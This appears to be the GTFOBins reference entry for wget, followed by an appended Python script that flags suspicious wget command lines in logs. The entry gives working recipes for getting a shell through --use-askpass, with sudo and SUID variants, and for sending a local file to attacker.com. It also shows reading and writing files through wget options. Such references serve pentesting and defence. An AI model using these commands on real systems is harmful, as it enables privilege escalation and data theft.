GTFOBins.github.io/_gtfobins/wget.md
Emanuel Duss 01042c2aa1
Add wget shell via --use-askpass
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 16:33:15 +01:00

1.7 KiB

functions:
  shell:
    - code: |
        TF=$(mktemp)
        chmod +x $TF
        echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
        wget --use-askpass=$TF 0
  file-upload:
    - description: Send a local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file is sent as-is, so instruct the service not to URL-decode the body. Use `--post-data` to send hard-coded data.
      code: |
        URL=http://attacker.com/
        LFILE=file_to_send
        wget --post-file=$LFILE $URL
  file-read:
    - description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, so this is not suitable for reading arbitrary binary data.
      code: |
        LFILE=file_to_read
        wget -i $LFILE
  file-write:
    - description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, so this is not suitable for writing arbitrary binary data.
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
        echo DATA > $TF
        wget -i $TF -o $LFILE
  file-download:
    - description: Fetch a remote file via an HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        wget $URL -O $LFILE
  suid:
    - code: |
        TF=$(mktemp)
        chmod +x $TF
        echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
        ./wget --use-askpass=$TF 0
  sudo:
    - code: |
        TF=$(mktemp)
        chmod +x $TF
        echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
        sudo wget --use-askpass=$TF 0
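
A defender-side check for the options this entry relies on, as an added example that is not part of the GTFOBins entry: it classifies logged command lines (for example from process-execution auditing) by which of the functions above the `wget` invocation would enable. The function names, sample lines and hostnames are constructed for illustration; `--input-file` and `--output-file` are the long forms of `-i` and `-o`.

```python
import os
import shlex

# wget options used by the entries above, mapped to the function they enable.
WATCHED = {
    "--use-askpass": "shell",
    "--post-file": "file-upload",
    "--input-file": "file-read",
    "-i": "file-read",
}
LOG_OPTS = {"--output-file", "-o"}  # combined with -i this becomes file-write

SAMPLE = [  # constructed command lines, not real telemetry
    "sudo wget --use-askpass=/tmp/tmp.Ab12Cd 0",
    "./wget --post-file report.txt http://collector.example/",
    "/usr/bin/wget -i /tmp/list -o /tmp/out.log",
    "wget -q https://mirror.example/pkg.tar.gz -O pkg.tar.gz",
]


def classify(cmdline):
    """Return (functions, via_sudo) for one logged command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:              # unbalanced quotes in the log record
        argv = cmdline.split()
    via_sudo = bool(argv) and os.path.basename(argv[0]) == "sudo"
    # Find wget whether bare, path-qualified (./wget) or behind sudo.
    idx = next((i for i, a in enumerate(argv)
                if os.path.basename(a) == "wget"), None)
    if idx is None:
        return set(), False
    found, log_redirect = set(), False
    for tok in argv[idx + 1:]:
        name = tok.split("=", 1)[0]          # handles --opt=value
        if name in WATCHED:
            found.add(WATCHED[name])
        elif tok.startswith("-i"):           # attached form: -iFILE
            found.add("file-read")
        if name in LOG_OPTS or tok.startswith("-o"):
            log_redirect = True
    if "file-read" in found and log_redirect:
        found.add("file-write")
    return found, via_sudo


def scan(lines):
    """Return (line, sorted functions, via_sudo) for every flagged line."""
    return [(line, sorted(f), s) for line in lines
            for f, s in [classify(line)] if f]
```

A plain download with `-O` is deliberately not flagged, and a SUID copy of `wget` cannot be recognised from the command line alone, so pair this with a file-system check for unexpected SUID bits.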